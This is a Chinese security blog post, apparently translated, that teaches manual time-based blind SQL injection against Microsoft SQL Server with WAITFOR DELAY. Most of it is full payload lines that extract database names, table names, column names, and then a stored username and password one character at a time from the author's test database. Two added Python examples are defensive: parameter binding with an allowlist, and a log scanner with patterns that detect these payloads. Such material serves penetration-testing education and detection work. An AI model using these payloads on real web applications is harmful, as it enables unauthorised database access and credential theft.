
Manual Injection on Microsoft SQL Server: Time-Based Blind Injection with Delays

Introduction to delay-based injection

The delay statement WAITFOR DELAY

WAITFOR is a flow-control statement provided by Transact-SQL in SQL Server. Its purpose is to wait for a specified amount of time and then continue executing the statements that follow. It takes a DELAY argument that specifies how long to wait.

If this statement is injected successfully, the database delays returning the result set by that fixed amount of time, and the web request's response is delayed by the same amount. Because the statement involves no conditional logic, it is easy to inject successfully. By observing whether the web request is delayed, a penetration tester can determine whether the site has an injection vulnerability. At the same time, because the statement returns no particular content, it is also an important detection method for blind injection.

Syntax:

WAITFOR DELAY '0:0:n'

Example:

WAITFOR DELAY '0:0:4' --  delays 4 seconds

The IF exists () clause

Syntax:

IF exists () WAITFOR DELAY '0:0:5'
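As an added example that is not part of the original post, the following Python shows the two controls that keep statements like the ones above from ever reaching the database engine as SQL: a strict allowlist on the request parameter and parameter binding. The standard-library sqlite3 module stands in for SQL Server so the code runs offline; the table name `news`, the parameter name `id` and the request handler are assumptions made for the example.

```python
import sqlite3

# Constructed stand-in schema (sqlite3 instead of SQL Server, so it runs offline).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", [(5, "hello"), (6, "world")])
    return conn

# Payload shapes from the post, as they would arrive in an `id` query parameter.
PAYLOADS = [
    "5;WAITFOR DELAY '0:0:4'--",
    "5 if ((select count(*) from master.dbo.sysdatabases where dbid=5)=1) waitfor delay '0:0:3'--",
    "5 if (ascii(substring((select top 1 username from users),1,1)) = 115) WAITFOR DELAY '0:0:3'--",
]

def validate_id(raw):
    """Allowlist: an id is a short string of decimal digits and nothing else.
    Returns the integer value, or None if the input is rejected."""
    if isinstance(raw, str) and raw.isdigit() and len(raw) <= 10:
        return int(raw)
    return None

def lookup_param(conn, raw_id):
    """Bound parameter: the value is sent separately from the statement text,
    so no part of it is parsed as SQL and a WAITFOR inside it can never run.
    A non-numeric value simply matches no row."""
    rows = conn.execute("SELECT title FROM news WHERE id = ?", (raw_id,)).fetchall()
    return [r[0] for r in rows]

def handle_request(conn, raw_id):
    """What the endpoint should do: validate first, then bind (hypothetical handler)."""
    id_value = validate_id(raw_id)
    if id_value is None:
        return {"status": 400, "rows": []}
    return {"status": 200, "rows": lookup_param(conn, id_value)}

if __name__ == "__main__":
    db = make_db()
    print(handle_request(db, "5"))
    for p in PAYLOADS:
        print(handle_request(db, p), lookup_param(db, p))
```

Both layers are shown because they fail independently: the allowlist rejects every payload shape from the post before a query is built, and even when a payload is passed straight to the bound query it matches nothing, since it is a value rather than SQL text.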

Manual time-based injection

1. Determine whether injection exists

WAITFOR DELAY '0:0:4'

2. Guess the database name

Test whether a database exists

if ((select count(*) from master.dbo.sysdatabases where dbid=5)=1) waitfor delay '0:0:3'--

This statement tests whether a database with the given dbid exists; if it does, the response is delayed by 3 seconds.

Guess the database name by dbid: first find its length

if ((select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=4)=1) waitfor delay '0:0:3'--

My instance contains only the two databases I created: test (dbid 5) and saulgoodman (dbid 6).

So I can use the statement above to test whether the name of the dbid 5 database has the tested length; if it does, the response is delayed by 3 seconds.

Likewise, the length of dbid 6 (saulgoodman) can be tested with this statement:

if ((select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=11)=1) waitfor delay '0:0:3'--

If there are more databases, just repeat the same statement for each of them.

Query the database names one by one by dbid

Since we know which dbid the test database has, we can guess its name one character at a time:

Guess character 1: t
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) = 116) WAITFOR DELAY '0:0:3'--
Guess character 2: e
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) = 101) WAITFOR DELAY '0:0:3'--
Guess character 3: s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),3,1)) = 115) WAITFOR DELAY '0:0:3'--
Guess character 4: t

To query the dbid 6 database saulgoodman, just change the dbid number:

Guess character 1: s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),1,1)) = 115) WAITFOR DELAY '0:0:3'--
Guess character 2: a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),2,1)) = 97) WAITFOR DELAY '0:0:3'--
Guess character 3: u
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),3,1)) = 117) WAITFOR DELAY '0:0:3'--
Guess character 4: l
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),4,1)) = 108) WAITFOR DELAY '0:0:3'--
Guess character 5: g
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),5,1)) = 103) WAITFOR DELAY '0:0:3'--
Guess character 6: o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),6,1)) = 111) WAITFOR DELAY '0:0:3'--
Guess character 7: o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),7,1)) = 111) WAITFOR DELAY '0:0:3'--
Guess character 8: d
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),8,1)) = 100) WAITFOR DELAY '0:0:3'--
Guess character 9: m
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),9,1)) = 109) WAITFOR DELAY '0:0:3'--
Guess character 10: a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),10,1)) = 97) WAITFOR DELAY '0:0:3'--
Guess character 11: n
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),11,1)) = 110) WAITFOR DELAY '0:0:3'--

3. Guess table names

Now that we know the database name is test, we can use the following statement to test whether the length of the first table name is 5 (the table name is users):

if ( (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and len(name)=5)=1) WAITFOR DELAY '0:0:3'--

As the screenshot showed, the page responded as expected, which tells us the table name length is 5, so we can guess its characters one by one: users

Guess character 1: u
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=117)=1) WAITFOR DELAY '0:0:3'--
Guess character 2: s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=115)=1) WAITFOR DELAY '0:0:3'--
Guess character 3: e
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,3,1))=101)=1) WAITFOR DELAY '0:0:3'--
Guess character 4: r
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,4,1))=114)=1) WAITFOR DELAY '0:0:3'--
Guess character 5: s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,5,1))=115)=1) WAITFOR DELAY '0:0:3'--

Now that we know the database name is test and the first table name is users, we can use the following statements to guess the characters of the second table name (the table name is info):

Guess character 1: i
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))=105)=1) WAITFOR DELAY '0:0:3'--
Guess character 2: n
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,2,1))=110)=1) WAITFOR DELAY '0:0:3'--
Guess character 3: f
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,3,1))=102)=1) WAITFOR DELAY '0:0:3'--
Guess character 4: o
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,4,1))=111)=1) WAITFOR DELAY '0:0:3'--

4. Guess column names

Now that we know the table name is users, we can guess the column names of the users table (the column name is username):

Guess character 1: u
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,1,1))=117)) WAITFOR DELAY '0:0:3'--
Guess character 2: s
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,2,1))=115)) WAITFOR DELAY '0:0:3'--
Guess character 3: e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,3,1))=101)) WAITFOR DELAY '0:0:3'--
Guess character 4: r
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,4,1))=114)) WAITFOR DELAY '0:0:3'--
Guess character 5: n
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,5,1))=110)) WAITFOR DELAY '0:0:3'--
Guess character 6: a
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,6,1))=97)) WAITFOR DELAY '0:0:3'--
Guess character 7: m
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,7,1))=109)) WAITFOR DELAY '0:0:3'--
Guess character 8: e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,8,1))=101)) WAITFOR DELAY '0:0:3'--

That recovers the first column name: username

Second method: the table has four columns, id, username, password and age

Get the first column (the column name is id):

Get character 1: i
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),1,1)) =105) WAITFOR DELAY '0:0:3'--
Get character 2: d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),2,1)) =100) WAITFOR DELAY '0:0:3'--

Get the second column (the column name is username):

Get character 1: u
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),1,1)) = 117) WAITFOR DELAY '0:0:3'--
Get character 2: s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),2,1)) = 115) WAITFOR DELAY '0:0:3'--
Get character 3: e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),3,1)) = 101) WAITFOR DELAY '0:0:3'--
Get character 4: r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),4,1)) = 114) WAITFOR DELAY '0:0:3'--
Get character 5: n
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),5,1)) = 110) WAITFOR DELAY '0:0:3'--
Get character 6: a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),6,1)) = 97) WAITFOR DELAY '0:0:3'--
Get character 7: m
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),7,1)) = 109) WAITFOR DELAY '0:0:3'--
Get character 8: e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),8,1)) = 101) WAITFOR DELAY '0:0:3'--

Get the third column (the column name is password):

Get character 1: p
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),1,1)) =112) WAITFOR DELAY '0:0:3'--
Get character 2: a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),2,1)) =97) WAITFOR DELAY '0:0:3'--
Get character 3: s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),3,1)) =115) WAITFOR DELAY '0:0:3'--
Get character 4: s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),4,1)) =115) WAITFOR DELAY '0:0:3'--
Get character 5: w
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),5,1)) =119) WAITFOR DELAY '0:0:3'--
Get character 6: o
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),6,1)) =111) WAITFOR DELAY '0:0:3'--
Get character 7: r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),7,1)) =114) WAITFOR DELAY '0:0:3'--
Get character 8: d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),8,1)) =100) WAITFOR DELAY '0:0:3'--

5. Guess the data character by character

We know the table name is users and the column names are username and password, so now we dump the data (the value is saul):

Test character 1 of the username column: s
if (ascii(substring((select top 1 username from users),1,1)) = 115) WAITFOR DELAY '0:0:3'--
Test character 2 of the username column: a
if (ascii(substring((select top 1 username from users),2,1)) = 97) WAITFOR DELAY '0:0:3'--
Test character 3 of the username column: u
if (ascii(substring((select top 1 username from users),3,1)) = 117) WAITFOR DELAY '0:0:3'--
Test character 4 of the username column: l
if (ascii(substring((select top 1 username from users),4,1)) =108) WAITFOR DELAY '0:0:3'--

This recovers the first username: saul

Get saul's password (the password is saul520):

Test character 1 of the password column: s
if (ascii(substring((select top 1 password from users),1,1)) =115) WAITFOR DELAY '0:0:3'--
Test character 2 of the password column: a
if (ascii(substring((select top 1 password from users),2,1)) =97) WAITFOR DELAY '0:0:3'--
Test character 3 of the password column: u
if (ascii(substring((select top 1 password from users),3,1)) =117) WAITFOR DELAY '0:0:3'--
Test character 4 of the password column: l
if (ascii(substring((select top 1 password from users),4,1)) =108) WAITFOR DELAY '0:0:3'--
Test character 5 of the password column: 5
if (ascii(substring((select top 1 password from users),5,1)) =53) WAITFOR DELAY '0:0:3'--
Test character 6 of the password column: 2
if (ascii(substring((select top 1 password from users),6,1)) =50) WAITFOR DELAY '0:0:3'--
Test character 7 of the password column: 0
if (ascii(substring((select top 1 password from users),7,1)) =48) WAITFOR DELAY '0:0:3'--
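The whole procedure above leaves a recognisable trace on the web tier, which is what a defender can key on. As an added example that is not part of the original post, the following Python scans constructed access-log lines for the indicators those statements carry: the WAITFOR DELAY keyword, the master.dbo.sysdatabases / sysobjects / syscolumns catalog views, the ascii(substring(...)) and unicode(substring(...)) character probes, and a response time that matches the requested delay. The log format (method, path, status, response time in ms), the `/news.aspx?id=` endpoint and the 2500 ms threshold are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post).
# Assumed format: METHOD PATH STATUS RESPONSE_TIME_MS
SAMPLE_LOG = """\
GET /news.aspx?id=5 200 41
GET /news.aspx?id=5;WAITFOR%20DELAY%20'0:0:4'-- 200 4038
GET /news.aspx?id=5%20if%20((select%20count(*)%20from%20master.dbo.sysdatabases%20where%20dbid=5)=1)%20waitfor%20delay%20'0:0:3'-- 200 3019
GET /news.aspx?id=5%20if%20(ascii(substring((select%20top%201%20name%20from%20master.dbo.sysdatabases%20where%20dbid=6),1,1))%20=%20115)%20WAITFOR%20DELAY%20'0:0:3'-- 200 27
GET /news.aspx?id=7 200 38
"""

# Indicators taken from the statement shapes shown in the post, in the order
# they are reported.
PATTERNS = {
    "waitfor_delay": re.compile(r"waitfor\s+delay"),
    "mssql_catalog": re.compile(r"\b(sysdatabases|sysobjects|syscolumns)\b"),
    "char_probe": re.compile(r"\b(ascii|unicode)\s*\(\s*substring\s*\("),
}

LOG_RE = re.compile(r"^(\S+) (\S+) (\d{3}) (\d+)$")

def normalize(path):
    """Decode twice (covers double URL encoding), collapse whitespace, lowercase,
    so keyword matching is not defeated by %20, +, tabs or case changes."""
    decoded = unquote_plus(unquote_plus(path))
    return re.sub(r"\s+", " ", decoded).lower()

def analyze_line(line, delay_threshold_ms=2500):
    """Return a finding dict for a suspicious request, or None.
    delay_observed is True when a WAITFOR payload coincided with a slow response,
    i.e. the injected condition was true and the delay actually fired."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    _method, path, _status, ms = m.groups()
    norm = normalize(path)
    hits = [name for name, rx in PATTERNS.items() if rx.search(norm)]
    if not hits:
        return None
    ms = int(ms)
    return {
        "path": path,
        "indicators": hits,
        "response_ms": ms,
        "delay_observed": "waitfor_delay" in hits and ms >= delay_threshold_ms,
    }

def scan(log_text):
    """Run analyze_line over every line and collect the findings."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Note that the fourth sample line is still flagged even though it returned in 27 ms: a false condition produces no delay, so response time alone would miss most of the character-by-character probes, while the payload keywords catch every one of them. Timing is best used as confirmation that a flagged payload actually executed on the database.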

This article is shared from the WeChat public account SaulGoodman (TheSaulGoodman); author: PowerLiu


Originally published: 2020-04-03
